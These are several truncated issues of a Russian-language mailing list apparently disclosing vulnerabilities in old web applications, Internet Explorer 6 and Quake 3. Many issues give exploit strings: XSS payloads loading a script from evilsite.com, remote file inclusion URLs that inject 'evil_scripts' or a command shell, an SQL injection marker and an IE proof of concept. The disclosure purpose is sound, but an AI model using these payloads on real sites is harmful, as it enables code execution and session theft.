Компьютер для продвинутых пользователей В этом выпуске: ASPScriptz Guest Book ПО: ASPScriptz Guest Book Версия: 2.0 Сайт: http://www.aspscriptz.com Об ASPScriptz Guest Book: Гостевая книга с открытым исходным кодом. Просто скачайте и распакуйте в директорию root на вашем сервере. Администратор может запретить или разрешить использование HTML в книге. Уязвимость: С строк 109 по 113, находиться ошибочный код: ] GBOOK_UNAME = REQUEST.FORM"GBOOK_UNAME) GBOOK_EMAIL = REQUEST.FORM"GBOOK_EMAIL) GBOOK_CITY = REQUE...

Компьютер для продвинутых пользователей В этом выпуске: HostAdmin ПО: HostAdmin Версия: 3.1 О HostAdmin: HostAdmin разработанное для автоматического входа и управления аккуантом средство. Позволяет создавать и регистрировать домены, поддерживать в рабочем состоянии сайт и сообщать об ошибках. Так же позволяет работать с множеством аккуантов и производить над ними все возможные действия. Программа очень легко настраивается. Уязвимость: Ввод в "index.php, "functions.php" и "members.php" параметра "path" не п...

Компьютер для продвинутых пользователей В этом выпуске: DreamAccount ПО: DreamAccount Версия: 3.1 О DreamAccount: DreamAccount программное обеспечение для запоминания и рассылки информации. Уязвимость: Ввод в "auth.cookie.inc.php, "auth.header.inc.php" и "auth.sessions.inc.php" параметра "da_path" не проверяется, до использования во внутреннем файле. Это может быть использовано для выполнения кода внутри файла на сервере. Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информа...

Компьютер для продвинутых пользователей В этом выпуске: Microsoft Internet Explorer ПО: Microsoft Internet Explorer Версия: 6 SP2 Использование уязвимости: 1) exploit_1.html <frameset cols"0, > <frame src"exploit_2.html> </frameset> 2) exploit_2.html <script> self.resizeTo(2003, 1228); </script> Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...

Компьютер для продвинутых пользователей В этом выпуске: Kmita FAQ ПО: Kmita FAQ Версия: 1.0 Сайт: http://www.kmita-faq.com Использование уязвимости: http://www.example.com/search.php?q=<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT> http://www.example.com/index.php?catid[SQL] Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...

Компьютер для продвинутых пользователей В этом выпуске: LabWiki ПО: LabWiki Версия: 1.0 Сайт: http://www.bioinformatics.org/phplabware/labwiki/index.php Использование уязвимости: В поле ввода можно ввести код: ><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT> Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...

Компьютер для продвинутых пользователей В этом выпуске: CyBoards PHP Lite ПО: CyBoards PHP Lite Версия: 1.25 Использование уязвимости: http://www.target.com/path/include/common.php?script_path=CmdShell Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...

Компьютер для продвинутых пользователей В этом выпуске: Rumble ПО: Rumble Версия: 1.02 Использование уязвимости: http://www.site.com/[rumble_path]/config.php?configArr[pathtodir[evil_scripts] Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...

Компьютер для продвинутых пользователей В этом выпуске: Bookmark4U ПО: Bookmark4U Версия: 2.0.0 Cайт: http://bookmark4u.sourceforge.net/ Использование уязвимости: http://www.site.com/[Bookmark4Upath]/inc/dbase.php?env[include_prefix[evil_scripts] http://www.site.com/[Bookmark4Upath]/inc/config.php?env[include_prefix[evil_scripts] http://www.site.com/[Bookmark4Upath]/inc/common.php?env[include_prefix[evil_scripts] http://www.site.com/[Bookmark4Upath]/inc/function.php?env[include_prefix[evil_scripts] Не забу...

Компьютер для продвинутых пользователей В этом выпуске: Quake 3 ПО: Quake 3 Версия: 1.32с Описание: Движок Quake 3 разработан в 1999 году компанией id Software и по сей день является очень популярным. Распространяемый по лицензии GPL он применяется во многих игровых проектах. Уязвимость: Функция CL_ParseDownload находящаяся в code/client/cl_parse.c, использует клиенты для закачки и отправки команд на сервер. Функция использует подпись - 16 битный номер, отправляемый на сервер для копирования необработанной...